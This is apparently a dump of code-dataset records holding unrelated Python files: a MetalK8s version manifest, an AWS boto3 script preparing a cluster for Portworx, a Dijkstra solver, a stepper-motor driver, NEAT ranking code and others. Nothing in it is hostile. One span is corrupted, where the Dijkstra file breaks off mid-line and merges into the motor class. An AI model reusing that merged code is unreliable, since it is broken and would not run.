-> None:\n \"\"\"Load version information from `VERSION`.\"\"\"\n to_update = {\"VERSION_MAJOR\", \"VERSION_MINOR\", \"VERSION_PATCH\", \"VERSION_SUFFIX\"}\n with VERSION_FILE.open(\"r\", encoding=\"utf-8\") as fp:\n for line in fp:\n name, _, value = line.strip().partition(\"=\")\n # Don't overwrite random variables by trusting an external file.\n var = name.strip()\n if var in to_update:\n globals()[var] = value.strip()\n\n\nREPO_ROOT = (Path(__file__) / \"../../../\").resolve()\nVERSION_FILE = REPO_ROOT / \"VERSION\"\n\n# Metalk8s version.\n# (Those declarations are not mandatory, but they help pylint and mypy).\nVERSION_MAJOR: str\nVERSION_MINOR: str\nVERSION_PATCH: str\nVERSION_SUFFIX: str\n\nload_version_information()\n\nSHORT_VERSION: str = \"{}.{}\".format(VERSION_MAJOR, VERSION_MINOR)\nVERSION: str = \"{}.{}{}\".format(SHORT_VERSION, VERSION_PATCH, VERSION_SUFFIX)\n\n# Get shell ui version from package.json\nshell_ui_package_contents = (REPO_ROOT / \"shell-ui/package.json\").read_text(\n encoding=\"utf-8\"\n)\nSHELL_UI_VERSION: str = json.loads(shell_ui_package_contents)[\"version\"]\n\n# }}}\n# Container images {{{\n\nCENTOS_BASE_IMAGE: str = \"docker.io/centos\"\nCENTOS_BASE_IMAGE_SHA256: str = (\n # centos:7.9.2009\n \"e4ca2ed0202e76be184e75fb26d14bf974193579039d5573fb2348664deef76e\"\n)\n\nNGINX_IMAGE_VERSION: str = \"1.19.6-alpine\"\nNODEJS_IMAGE_VERSION: str = \"14.16.0\"\n\n# Current build IDs, to be augmented whenever we rebuild the corresponding\n# image, e.g. 
because the `Dockerfile` is changed, or one of the dependencies\n# installed in the image needs to be updated.\n# This should be reset to 1 when the service exposed by the container changes\n# version.\nSALT_MASTER_BUILD_ID = 1\n\n\ndef _version_prefix(version: str, prefix: str = \"v\") -> str:\n return \"{}{}\".format(prefix, version)\n\n\n# Digests are quite a mouthful, so:\n# pylint:disable=line-too-long\nCONTAINER_IMAGES: Tuple[Image, ...] = (\n # Remote images\n Image(\n name=\"alertmanager\",\n version=\"v0.22.2\",\n digest=\"sha256:624c1a5063c7c80635081a504c3e1b020d89809651978eb5d0b652a394f3022d\",\n ),\n Image(\n name=\"calico-node\",\n version=_version_prefix(CALICO_VERSION),\n digest=\"sha256:bc4a631d553b38fdc169ea4cb8027fa894a656e80d68d513359a4b9d46836b55\",\n ),\n Image(\n name=\"calico-kube-controllers\",\n version=_version_prefix(CALICO_VERSION),\n digest=\"sha256:904458fe1bd56f995ef76e2c4d9a6831c506cc80f79e8fc0182dc059b1db25a4\",\n ),\n Image(\n name=\"coredns\",\n version=\"v1.8.0\",\n digest=\"sha256:cc8fb77bc2a0541949d1d9320a641b82fd392b0d3d8145469ca4709ae769980e\",\n ),\n Image(\n name=\"dex\",\n version=\"v2.28.1\",\n digest=\"sha256:5e88f2205de172b60fd7af23ac92f34321688a83de9f7de7c9a6f394f6950877\",\n ),\n Image(\n name=\"etcd\",\n version=\"3.4.13-0\",\n digest=\"sha256:4ad90a11b55313b182afc186b9876c8e891531b8db4c9bf1541953021618d0e2\",\n ),\n Image(\n name=\"grafana\",\n version=\"8.0.1\",\n digest=\"sha256:1c3e2fc7896adf9e33be5d062c08066087cb556f63b0a95f8aefe92bd37a6f38\",\n ),\n Image(\n name=\"k8s-sidecar\",\n version=\"1.12.2\",\n digest=\"sha256:ca760f94b35eb78575b170e41d1e19e27359b29245dacfd1c42ae90452ecc08e\",\n ),\n Image(\n name=\"kube-apiserver\",\n version=_version_prefix(K8S_VERSION),\n digest=\"sha256:c86c3855e360b1483008c30c8deaed2b1a92f63eaacec819a90a0ffe04df152b\",\n ),\n Image(\n name=\"kube-controller-manager\",\n version=_version_prefix(K8S_VERSION),\n digest=\"sha256:2ea5e2885485fc20aaa15a0033d50e47ce7c559bf292741c16604984088bd700\",\n ),\n Image(\n name=\"kube-proxy\",\n version=_version_prefix(K8S_VERSION),\n digest=\"sha256:3ee783402715225d6bc483b3a2f8ea11adcb997d00fb5ca2f74734023ade0561\",\n ),\n Image(\n name=\"kube-scheduler\",\n version=_version_prefix(K8S_VERSION),\n digest=\"sha256:d372f36741c015e30d36aef958a021de4af7218c467edac91796fb03aab478b4\",\n ),\n Image(\n name=\"kube-state-metrics\",\n version=\"v2.0.0\",\n digest=\"sha256:eb2f41024a583e8795213726099c6f9432f2d64ab3754cc8ab8d00bdbc328910\",\n ),\n Image(\n name=\"nginx\",\n version=NGINX_IMAGE_VERSION,\n digest=\"sha256:629df02b47c8733258baf6663e308a86cd23f80247d35407022c35fd91a50ea3\",\n ),\n Image(\n name=\"nginx-ingress-controller\",\n version=\"v0.47.0\",\n digest=\"sha256:a1e4efc107be0bb78f32eaec37bef17d7a0c81bec8066cdf2572508d21351d0b\",\n ),\n Image(\n name=\"nginx-ingress-defaultbackend-amd64\",\n version=\"1.5\",\n digest=\"sha256:4dc5e07c8ca4e23bddb3153737d7b8c556e5fb2f29c4558b7cd6e6df99c512c7\",\n ),\n Image(\n name=\"node-exporter\",\n version=\"v1.1.2\",\n digest=\"sha256:22fbde17ab647ddf89841e5e464464eece111402b7d599882c2a3393bc0d2810\",\n ),\n Image(\n name=\"metallb-controller\",\n version=\"0.10.2-debian-10-r0\",\n digest=\"sha256:573792b177b3fbe2c645f0d4fa084b3d6b8dbb6e0510fac00b0aa256d8315299\",\n ),\n Image(\n name=\"metallb-speaker\",\n version=\"0.10.2-debian-10-r0\",\n digest=\"sha256:8dc5efb75ef21f9052265d6c1571199b0542515cd4a23349c8590c67f9f01b1b\",\n ),\n Image(\n name=\"pause\",\n version=\"3.2\",\n 
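# the pause image runs as the sandbox container in every Kubernetes pod\n        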
digest=\"sha256:80d28bedfe5dec59da9ebf8e6260224ac9008ab5c11dbbe16ee3ba3e4439ac2c\",\n ),\n Image(\n name=\"prometheus\",\n version=\"v2.27.1\",\n digest=\"sha256:5accb68b56ba452e449a5e552411acaeabbbe0f087acf19a1157ce3dd10a8bed\",\n ),\n Image(\n name=\"k8s-prometheus-adapter-amd64\",\n version=\"v0.8.4\",\n digest=\"sha256:a906f32c5ed3754acd6b197b730cc244a2103f86ac8a1522f55e9c5ea26f820a\",\n ),\n Image(\n name=\"prometheus-config-reloader\",\n version=\"v0.48.1\",\n digest=\"sha256:9bed3dae8023c7a83b906c6c8abd92900697fb3806f14b7f2dbfbc37fe4b7941\",\n ),\n Image(\n name=\"prometheus-operator\",\n version=\"v0.48.1\",\n digest=\"sha256:2e7b61c86ee8b0aef4f5da8b6a4e51ecef249c9ccf4a329c5aa0c81e3fd074c1\",\n ),\n # Local images\n Image(\n name=\"metalk8s-alert-logger\",\n version=VERSION,\n digest=None,\n ),\n Image(\n name=\"metalk8s-ui\",\n version=VERSION,\n digest=None,\n ),\n Image(\n name=\"shell-ui\",\n version=VERSION,\n digest=None,\n ),\n Image(\n name=\"metalk8s-utils\",\n version=VERSION,\n digest=None,\n ),\n Image(\n name=\"salt-master\",\n version=\"{version}-{build_id}\".format(\n version=SALT_VERSION, build_id=SALT_MASTER_BUILD_ID\n ),\n digest=None,\n ),\n Image(\n name=\"storage-operator\",\n version=\"latest\",\n digest=None,\n ),\n Image(\n name=\"loki\",\n version=\"2.2.1\",\n digest=\"sha256:01a278feebe94db18cd83e874db4d4a73713a62be6f3b1503ebe0100a6085c1f\",\n ),\n Image(\n name=\"fluent-bit-plugin-loki\",\n version=\"2.1.0-amd64\",\n digest=\"sha256:bedd17176ced6106404606d31f6d6bfa56b10d769074c0b624fb0bc470b081c2\",\n ),\n)\n\nCONTAINER_IMAGES_MAP = {image.name: image for image in CONTAINER_IMAGES}\n\n# }}}\n\n# Packages {{{\n\n\nclass PackageVersion:\n \"\"\"A package's authoritative version data.\n\n This class contains version information for a named package, and\n provides helper methods for formatting version/release data as well\n as version-enriched package name, for all supported OS families.\n \"\"\"\n\n def __init__(\n self,\n name: str,\n version: Optional[str] = None,\n release: Optional[str] = None,\n override: Optional[str] = None,\n ):\n \"\"\"Initializes a package version.\n\n Arguments:\n name: the name of the package\n version: the version of the package\n release: the release of the package\n \"\"\"\n self._name = name\n self._version = version\n self._release = release\n self._override = override\n\n name = property(operator.attrgetter(\"_name\"))\n version = property(operator.attrgetter(\"_version\"))\n release = property(operator.attrgetter(\"_release\"))\n override = property(operator.attrgetter(\"_override\"))\n\n @property\n def full_version(self) -> Optional[str]:\n \"\"\"The full package version string.\"\"\"\n full_version = None\n if self.version:\n full_version = self.version\n if self.release:\n full_version = \"{}-{}\".format(self.version, self.release)\n return full_version\n\n @property\n def rpm_full_name(self) -> str:\n \"\"\"The package's full name in RPM conventions.\"\"\"\n if self.full_version:\n return \"{}-{}\".format(self.name, self.full_version)\n return cast(str, self.name)\n\n\n# The authoritative list of packages required.\n#\n# Common packages are packages for which we need not care about OS-specific\n# divergences.\n#\n# In this case, either:\n# * the _latest_ version is good enough, and will be the one\n# selected by the package managers (so far: apt and yum).\n# * we have strict version requirements that span OS families, and the\n# version schemes _and_ package names do not diverge\n#\n# Strict version requirements are 
notably:\n# * kubelet and kubectl which _make_ the K8s version of the cluster\n# * salt-minion which _makes_ the Salt version of the cluster\n#\n# These common packages may be overridden by OS-specific packages if package\n# names or version conventions diverge.\n#\n# Packages that we build ourselves require a version and release as part of\n# their build process.\n\nPACKAGES: Dict[str, Any] = {\n \"common\": (\n # Pinned packages\n PackageVersion(name=\"kubectl\", version=K8S_VERSION),\n PackageVersion(name=\"kubelet\", version=K8S_VERSION),\n # Latest packages\n PackageVersion(name=\"coreutils\"),\n PackageVersion(name=\"cri-tools\"),\n PackageVersion(name=\"e2fsprogs\"),\n PackageVersion(name=\"ebtables\"),\n PackageVersion(name=\"ethtool\"),\n PackageVersion(name=\"gdisk\"),\n PackageVersion(name=\"genisoimage\"),\n PackageVersion(name=\"httpd-tools\"),\n PackageVersion(name=\"iproute\"),\n PackageVersion(name=\"iptables\"),\n PackageVersion(name=\"kubernetes-cni\"),\n PackageVersion(name=\"lvm2\"),\n PackageVersion(name=\"m2crypto\"),\n PackageVersion(name=\"python36-psutil\"),\n PackageVersion(name=\"python36-pyOpenSSL\"),\n PackageVersion(name=\"runc\"),\n PackageVersion(name=\"salt-minion\", version=SALT_VERSION),\n PackageVersion(name=\"socat\"),\n # TODO download built package dependencies\n PackageVersion(name=\"sos\", version=SOS_VERSION),\n PackageVersion(name=\"util-linux\"),\n PackageVersion(name=\"yum-utils\"),\n PackageVersion(name=\"xfsprogs\"),\n ),\n \"redhat\": {\n \"7\": (\n PackageVersion(\n name=\"calico-cni-plugin\",\n version=CALICO_VERSION,\n release=\"{0}.el7\".format(CALICO_RELEASE),\n ),\n PackageVersion(\n name=\"containerd\",\n version=CONTAINERD_VERSION,\n release=\"{0}.el7\".format(CONTAINERD_RELEASE),\n ),\n PackageVersion(name=\"container-selinux\"), # TODO #1710\n PackageVersion(\n name=\"metalk8s-sosreport\",\n version=SHORT_VERSION,\n release=\"{0}.el7\".format(SOSREPORT_RELEASE),\n ),\n PackageVersion(name=\"yum-plugin-versionlock\"),\n ),\n \"8\": (\n PackageVersion(\n name=\"calico-cni-plugin\",\n version=CALICO_VERSION,\n release=\"{0}.el8\".format(CALICO_RELEASE),\n ),\n PackageVersion(\n name=\"containerd\",\n version=CONTAINERD_VERSION,\n release=\"{0}.el8\".format(CONTAINERD_RELEASE),\n ),\n PackageVersion(name=\"container-selinux\"),\n PackageVersion(name=\"iptables-ebtables\", override=\"ebtables\"),\n PackageVersion(\n name=\"metalk8s-sosreport\",\n version=SHORT_VERSION,\n release=\"{0}.el8\".format(SOSREPORT_RELEASE),\n ),\n PackageVersion(name=\"python3-m2crypto\", override=\"m2crypto\"),\n PackageVersion(name=\"python3-dnf-plugin-versionlock\"),\n PackageVersion(name=\"python3-psutil\", override=\"python36-psutil\"),\n PackageVersion(name=\"python3-pyOpenSSL\", override=\"python36-pyOpenSSL\"),\n ),\n },\n}\n\n\ndef _list_pkgs_for_os_family(os_family: str) -> Dict[str, Tuple[PackageVersion, ...]]:\n \"\"\"List downloaded packages for a given OS family.\n\n Arguments:\n os_family: OS_family for which to list packages\n \"\"\"\n common_pkgs = PACKAGES[\"common\"]\n os_family_pkgs = PACKAGES.get(os_family)\n os_pkgs = {}\n\n if os_family_pkgs is None:\n raise Exception(\"No packages for OS family: {}\".format(os_family))\n\n for version, pkgs in os_family_pkgs.items():\n os_override_names = [pkg.override for pkg in pkgs if pkg.override is not None]\n\n # pylint: disable=cell-var-from-loop\n overridden = filter(\n lambda item: item.name not in os_override_names, common_pkgs\n )\n\n os_pkgs[version] = tuple(overridden) + 
os_family_pkgs[version]\n\n return os_pkgs\n\n\nREDHAT_PACKAGES = _list_pkgs_for_os_family(\"redhat\")\n\nREDHAT_PACKAGES_MAP = {\n version: {pkg.name: pkg for pkg in pkgs}\n for version, pkgs in REDHAT_PACKAGES.items()\n}\n\n# }}}\n\n# This variables holds the contents of the rendered\n# \"salt/metalk8s/versions.json\" file (useful in tests)\nSALT_VERSIONS_JSON = {\n \"kubernetes\": {\"version\": K8S_VERSION},\n \"packages\": {\n \"centos\": {\n version: {pkg.name: {\"version\": pkg.full_version} for pkg in pkgs}\n for version, pkgs in REDHAT_PACKAGES.items()\n },\n \"redhat\": {\n version: {pkg.name: {\"version\": pkg.full_version} for pkg in pkgs}\n for version, pkgs in REDHAT_PACKAGES.items()\n },\n },\n \"images\": {img.name: {\"version\": img.version} for img in CONTAINER_IMAGES},\n \"metalk8s\": {\"version\": VERSION},\n}\n","sub_path":"buildchain/buildchain/versions.py","file_name":"versions.py","file_ext":"py","file_size_in_byte":14988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"491249276","text":"#!/usr/bin/env python\n#\n# ready4px: Take a cluster that has been deployed through Tectonic,\n# and make it ready to run/deploy Portworx\n#\n# Inputs:\n# Environment:\n# AWS_CLUSTER : Corresponds to CLUSTER from Tectonic\n# AWS_SECRET_ACCESS_KEY, AWS_ACCESS_KEY_ID, \n# AWS_DEFAULT_REGION : Amazon credentials and region\n# AWS_VOL_TYPE: standard'|'io1'|'gp2'|'sc1'|'st1'\n# AWS_VOL_SIZE: in GBs\n# AWS_VOL_NAMES: /dev names for attach. Start with \"/dev/xvdd\", ...\n#\n# Assumptions:\n# The target cluster has a set of instances derived from two\n# auto-scaling groups called $AWS_CLUSTER-masters and $AWS_CLUSTER-workers\n# This happens to be the structure for Tectonic.\n# This may apply to other targets.\n# \n\nimport os\nimport sys\nimport time\nimport boto3\nfrom pprint import pprint\nfrom botocore.exceptions import ClientError\n\n# PX-ports, needed open between workers\npxports = [ 9001, 9002, 9003, 9010, 9012, 9014 ]\nenvars = [ \"AWS_SECRET_ACCESS_KEY\", \"AWS_ACCESS_KEY_ID\", \"AWS_DEFAULT_REGION\",\n \"AWS_CLUSTER\", \"AWS_VOL_TYPE\", \"AWS_VOL_SIZE\", \"AWS_VOL_NAMES\" ]\n\n\ndef check_prereqs():\n for e in envars:\n # if not os.getenv(e): \n if not e in os.environ:\n print (\"FATAL: {} is not defined\".format(e))\n sys.exit(-1)\n\n#\n# asg_to_iids: Given an auto-scaling group name, return the corresponding list of instanceIDs\n#\ndef asg_to_iids(asgname):\n\n asclient = boto3.client('autoscaling')\n\n # Array of instance IDs\n iids = []\n\n asgs = asclient.describe_auto_scaling_groups(\n AutoScalingGroupNames=[\n asgname\n ]\n )\n \n for a in asgs['AutoScalingGroups']:\n for ids in a['Instances']:\n iids.append(ids['InstanceId'])\n \n return iids\n\n\ndef list_instances(grp, iids):\n for i in iids:\n print ('{} : {}'.format(grp,i))\n \ndef pxify_masters(ec2, master_sg):\n\n print (\"px-ifying \", master_sg)\n msg = ec2.SecurityGroup(master_sg)\n try:\n msg.authorize_ingress( IpProtocol=\"tcp\", CidrIp=\"0.0.0.0/0\", FromPort=30062, ToPort=30062 )\n except ClientError as e:\n if e.response['Error']['Code'] == 'EntityAlreadyExists':\n print (\"Object already exists\")\n else:\n print (\"Unexpected error: %s\" % e)\n\n\n#\n# Add ports to the workers Security Group\n#\ndef pxify_workers_sg (ec2, worker_sg, wvpc):\n\n print (\"px-ifying security group\", worker_sg)\n wsg = ec2.SecurityGroup(worker_sg)\n\n for p in pxports:\n try:\n wsg.authorize_ingress( IpPermissions=[{'FromPort': p, 'IpProtocol': 'tcp', 'ToPort': p,\n 
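# self-referencing rule: only members of the worker SG may reach the PX ports\n                                                 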
'UserIdGroupPairs' : [{'GroupId': worker_sg, 'VpcId' : wvpc}]}])\n print (\"Added port {} to security_group {}\".format(p, worker_sg))\n except ClientError as e:\n if e.response['Error']['Code'] == 'EntityAlreadyExists':\n print (\"Object already exists\")\n else:\n print (\"Unexpected error: %s\" % e)\n\ndef waitfor_vol (ec2r, volid):\n while True:\n if ec2r.Volume(volid).state == \"available\":\n return\n else:\n print (\" Waiting for \", volid)\n time.sleep(2)\n#\n# Add and attach volumes to the workers instances\n# \ndef pxify_workers_vols (ec2c, ec2r, workers):\n\n vol_size = os.getenv(\"AWS_VOL_SIZE\")\n vol_type = os.getenv(\"AWS_VOL_TYPE\")\n vol_names = os.environ.get(\"AWS_VOL_NAMES\").split(\" \")\n vol_region = os.getenv(\"AWS_DEFAULT_REGION\")\n \n for w in workers:\n print (\"Creating volumes for instance : \", w)\n az = ec2r.Instance(w).placement['AvailabilityZone']\n print (\" {} has az {}\".format(w, az))\n # Count the number of disks per instance. Make sure there aren't more than there should be\n # nblkdevs = len(ec2r.Instance(w).block_device_mappings)\n # print (\"Instance {} has {} devices attached\".format(w, nblkdevs))\n \n for name in vol_names:\n try:\n vol = ec2c.create_volume ( AvailabilityZone=az, Size=int(vol_size), VolumeType=vol_type)\n print (\" Created \", vol['VolumeId'])\n waitfor_vol (ec2r, vol['VolumeId'])\n try:\n ec2r.Instance(w).attach_volume( Device=name, VolumeId=vol['VolumeId'])\n print (\" Attached {} to {}\".format(vol['VolumeId'], w))\n except ClientError as e:\n print (\" Volume attach error: %s\" % e)\n \n except ClientError as e:\n print (\" Volume create error: %s\" % e)\n\n\n\nif __name__ == \"__main__\":\n\n check_prereqs()\n\n masters_asg = '{}-{}'.format(os.getenv(\"AWS_CLUSTER\"),\"masters\")\n workers_asg = '{}-{}'.format(os.getenv(\"AWS_CLUSTER\"),\"workers\")\n \n masters = asg_to_iids(masters_asg)\n workers = asg_to_iids(workers_asg)\n \n if not masters or not workers:\n print(\"No instances listed for cluster : \", os.getenv(\"AWS_CLUSTER\"))\n sys.exit(-1)\n\n ec2c = boto3.client('ec2')\n ec2r = boto3.resource('ec2')\n\n list_instances(masters_asg, masters)\n master_sg = ec2r.Instance(masters[0]).security_groups[0]['GroupId']\n print (\"Masters Security Group = \", master_sg)\n pxify_masters(ec2r, master_sg)\n \n list_instances(workers_asg, workers)\n worker_sg = ec2r.Instance(workers[0]).security_groups[0]['GroupId']\n print (\"Workers Security Group = \", worker_sg)\n worker_vpc = ec2r.Instance(workers[0]).vpc_id\n pxify_workers_sg (ec2r, worker_sg, worker_vpc)\n\n pxify_workers_vols (ec2c, ec2r, workers)\n","sub_path":"aws/scripts/rpx.py","file_name":"rpx.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"449365428","text":"import json\nfrom django.shortcuts import *\nfrom django.template import RequestContext\nfrom linki.forms import *\n\ndef advert(request):\n if request.method == \"POST\":\n form = AdvertForm(request.POST)\n\n message = 'something wrong!'\n if(form.is_valid()):\n print(request.POST['title'])\n message = request.POST['title']\n\n return HttpResponse(json.dumps({'message': message}))\n\n return render_to_response('contact/advert.html',\n {'form':AdvertForm()}, RequestContext(request))","sub_path":"blog/tview.py","file_name":"tview.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"189168558","text":"from heapq 
import *\r\nN,M,C=map(int,input().split())\r\npath=[[] for _ in range(N+1)]\r\nfor _ in range(M):\r\n X,Y,Z=map(int,input().split())\r\n path[X].append((Z,Y))\r\ndistance=[654321]*(N+1)\r\nq=[]\r\nheapify(q)\r\nheappush(q,(0,C))\r\ndistance[C]=0\r\nwhile q:\r\n dist,now=heappop(q)\r\n if distance[now] 0.1:\n self.mStep_wait = 0.1\n else:\n self.mStep_wait = wait\n\n \"\"\"CWに1Step移動する\"\"\"\n def Step_CW(self, step, wait):\n self.SetWaitTime(wait)\n for i in range(0, step):\n if self.mNSeq >= 7:\n self.SetPinsVoltage(0)\n else:\n self.SetPinsVoltage(self.mNSeq+1)\n sleep(self.mStep_wait)\n\n \"\"\"CCWに1Step移動する\"\"\"\n def Step_CCW(self, step, wait):\n self.SetWaitTime(wait)\n for i in range(0, step):\n if self.mNSeq <= 0:\n self.SetPinsVoltage(7)\n else:\n self.SetPinsVoltage(self.mNSeq-1)\n sleep(self.mStep_wait)\n\n \"\"\"終了処理\"\"\"\n def Cleanup(self):\n GPIO.cleanup()\n\n\"\"\"メイン関数\"\"\"\nif __name__ == '__main__':\n StepMoter = C28BYJ48(IN1=4, IN2=17, IN3=27, IN4=22)\n #Main loop\n try:\n while True:\n StepMoter.Step_CW(4096,0.001)\n sleep(0.5)\n StepMoter.Step_CCW(4096,0.001)\n sleep(0.5)\n\n except KeyboardInterrupt : #Ctl+Cが押されたらループを終了\n print(\"\\nCtl+C\")\n except Exception as e:\n print(str(e))\n finally:\n StepMoter.Cleanup()\n print(\"\\nexit program\")\n","sub_path":"c28byj48.py","file_name":"c28byj48.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"139780069","text":"'''\nCreated on Nov 22, 2015\n\n@author: soroosh\n'''\nimport os\nimport numpy as np\nimport random\n\nGroundTruthHolder = []\n\ndef readAllFileNames(destdir, extension):\n return [f for f in os.listdir(destdir) if (extension == '*' or f.endswith('.' + extension))]\n\n\ndef groundTruthValue(configObject ,filename, req_millisecond):\n '''\n Returns the label of a frame based on ground truth\n \n \n :param configObject:\n :param filename:\n :param req_millisecond:\n '''\n if len(GroundTruthHolder) == 0:\n readGroundTruth(configObject)\n \n fileobject = [x for x in GroundTruthHolder if x['Filename'] == filename]\n \n if len(fileobject) == 0:\n raise Exception('groundtruth data not found')\n \n if fileobject[0]['Jump #1'] == '' and fileobject[0]['Jump #2'] == '':\n return 0;\n \n \n min1 = fileobject[0]['Jump #1'].split(':')[0]\n sec1 = fileobject[0]['Jump #1'].split(':')[1]\n #check if it is in the first jump\n _jump1_msecs = (int(min1) * 60 + int(sec1)) * 1000\n \n if req_millisecond + 1000 >= _jump1_msecs and req_millisecond <=_jump1_msecs + 4000:\n return 1\n \n \n if fileobject[0]['Jump #2'] is not '':\n min2 = fileobject[0]['Jump #2'].split(':')[0]\n sec2 = fileobject[0]['Jump #2'].split(':')[1]\n _jump2_msecs = (int(min2) * 60 + int(sec2)) * 1000\n if req_millisecond + 1000 >= _jump2_msecs and req_millisecond <=_jump2_msecs + 4000:\n return 1\n \n return 0\n\ndef readGroundTruth(configObject):\n '''\n Reads Ground Truth File\n \n \n :param configObject:\n '''\n f = open(configObject['ground-truth'], 'r')\n \n for line in f.readlines():\n _splitted = line.strip().split(',')\n \n if len(_splitted) < 7:\n continue\n \n GroundTruthHolder.append({'#' : _splitted[0], 'Filename' : _splitted[1], 'Hands' : _splitted[2], 'Feet' : _splitted[3], 'Empty' : _splitted[4], 'Jump #1' : _splitted[5], 'Jump #2' : _splitted[6]})\n \n \n f.close()\n \n \ndef SplitToSetLabel( instances):\n _outputInstances = [x[1:] for x in instances]\n _outputLabels = [int(x[0]) for x in instances]\n return (np.asarray(_outputInstances), 
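# -> (features, labels)\n            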
np.asarray(_outputLabels))\n \ndef ShakeData(instances):\n random.shuffle(instances)\n return np.asarray(instances)","sub_path":"SimilarityModeling1/src/Feaures/Helper.py","file_name":"Helper.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"510501433","text":"def checkColumnas(sudoku):\n fila1 = sudoku[0]\n nfilas = len(sudoku) - 1\n for numero in fila1:\n indexfila = 0\n# posicion que ocupa el numero en las diferentes\n#filas, si es igual entre filas, esta mal\n while indexfila < nfilas:\n indexfilasiguiente = indexfila + 1\n try:\n posnumerofilasiguiente = sudoku[indexfilasiguiente].index(numero)\n except ValueError:\n return False\n else:\n if posnumerofilasiguiente == fila1.index(numero):\n return False\n else:\n indexfila += 1\n return True\n\n\n\nif __name__ == \"__main__\":\n \n test = [[1, 2, 3],\n [2, 3, 1],\n [3, 1, 2]]\n \n test2 = [[1,2,3,4],\n [2,3,1,3],\n [3,1,2,3],\n [4,4,4,2]]\n\n assert checkColumnas(test) \n assert checkColumnas(test2) == False","sub_path":"checkcolumnas.py","file_name":"checkcolumnas.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"458061839","text":"import math\nimport operator\nimport sys\n\nfrom src.Config import Config\n\n\"\"\"a collection of the population ranking functions which were tested\"\"\"\n\ndef single_objective_rank(individuals):\n individuals.sort(key=lambda indv: (0 if not indv.fitness_values else indv.fitness_values[0]), reverse=True)\n for i, individual in enumerate(individuals):\n individual.rank = i + 1\n\n\ndef cdn_pareto_front(individuals):\n individuals.sort(key=lambda indv: indv.fitness_values[0], reverse=True)\n\n pf = [individuals[0]] # pareto front populated with best individual in primary objective\n\n for indv in individuals[1:]:\n if Config.second_objective_comparator(indv.fitness_values[1], pf[-1].fitness_values[1]):\n pf.append(indv)\n\n return pf\n\n\ndef cdn_rank(individuals):\n ranked_individuals = []\n fronts = []\n remaining_individuals = set(individuals)\n\n while len(remaining_individuals) > 0:\n pf = cdn_pareto_front(list(remaining_individuals))\n fronts.append(pf)\n remaining_individuals = remaining_individuals - set(pf)\n ranked_individuals.extend(pf)\n\n for i, indv in enumerate(ranked_individuals):\n indv.rank = i + 1\n return fronts\n\n\ndef nsga_rank(individuals):\n fronts = general_pareto_sorting(individuals)\n\n rank = 1\n\n for front in fronts:\n # rank is firstly based on which front the indv is in\n distances = {}\n for objective in range(len(individuals[0].fitness_values)):\n # estimate density by averaging the two nearest along each objective axis, then combining each distance\n objective_sorted = sorted(front, key=lambda x: x.fitness_values[objective])\n for i, indv in enumerate(objective_sorted):\n if i == 0 or i == len(objective_sorted) - 1:\n distance = sys.maxsize\n else:\n distance = (abs(\n objective_sorted[i].fitness_values[objective] - objective_sorted[i + 1].fitness_values[\n objective]) + abs(\n objective_sorted[i].fitness_values[objective] - objective_sorted[i - 1].fitness_values[\n objective])) / 2\n distance = math.pow(distance, 2)\n\n if objective == 0:\n distances[indv] = []\n distances[indv].append(distance)\n\n distance_sorted = sorted(front, key=lambda x: sum(distances[x]), reverse=True)\n for indv in distance_sorted:\n indv.rank = rank\n rank += 1\n\n\ndef 
general_pareto_sorting(individuals, return_pareto_front_only=False):\n \"\"\"takes in a list of individuals and returns a list of fronts, each being a list of individuals\"\"\"\n fronts = [[]]\n dominations = {}\n domination_counts = {}\n for indv in individuals:\n dominated_count = 0\n domination_by_indv = []\n for comparitor in individuals:\n if indv == comparitor:\n continue\n if check_domination(indv, comparitor):\n domination_by_indv.append(comparitor)\n elif check_domination(comparitor, indv):\n dominated_count += 1\n if dominated_count == 0:\n fronts[0].append(indv)\n\n dominations[indv] = domination_by_indv\n domination_counts[indv] = dominated_count\n\n if return_pareto_front_only:\n return fronts[0]\n\n front_number = 0\n while True:\n next_front = set()\n for leader in fronts[front_number]:\n for dominated_individual in dominations[leader]:\n domination_counts[dominated_individual] -= 1\n if domination_counts[dominated_individual] == 0:\n next_front.add(dominated_individual)\n\n if len(next_front) == 0:\n break\n fronts.append(next_front)\n front_number += 1\n\n return fronts\n\n\ndef check_domination(domination_candidate, comparitor):\n \"\"\"checks if the domination candidate dominates the comparitor\"\"\"\n for i in range(len(domination_candidate.fitness_values)):\n if i == 0:\n comparison = operator.gt # objective 0 is always maximised\n else:\n comparison = Config.second_objective_comparator if i == 1 else Config.third_objective_comparator\n\n if comparison(comparitor.fitness_values[i], domination_candidate.fitness_values[i]):\n return False\n return True\n\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n from src.NEAT.Genome import Genome\n import random\n\n fake_individuals = []\n for i in range(100):\n fake_individuals.append(Genome([], []))\n fake_individuals[-1].fitness_values = [random.random(), random.random()]\n fronts = general_pareto_sorting(fake_individuals)\n # print(len(fronts))\n for front in fronts:\n sorted_front = sorted(front, key=lambda indv: indv.fitness_values[0])\n x = [indv.fitness_values[0] for indv in sorted_front]\n y = [indv.fitness_values[1] for indv in sorted_front]\n plt.plot(x, y)\n plt.show()\n","sub_path":"src/NEAT/PopulationRanking.py","file_name":"PopulationRanking.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"31470047","text":"import time\nimport json\nfrom tweepy.streaming import StreamListener\nfrom solariat_bottle.daemons.twitter.stream.eventlog import InMemEvents, Events\nfrom solariat_bottle.settings import LOGGER\nfrom solariat.utils.timeslot import now\n\nsleep = time.sleep\n\n\nclass BaseListener(StreamListener):\n\n def __init__(self, stream, stream_manager, db=None, api=None, logger=LOGGER):\n\n super(BaseListener, self).__init__(api=api)\n self.logger = logger\n self.last_keep_alive = None\n self.last_event = None\n self.last_status_id = None\n self.stream = stream\n self.stream_id = stream.stream_id\n self.auth = stream.auth_params\n\n self.db = db or InMemEvents()\n self.stream_manager = 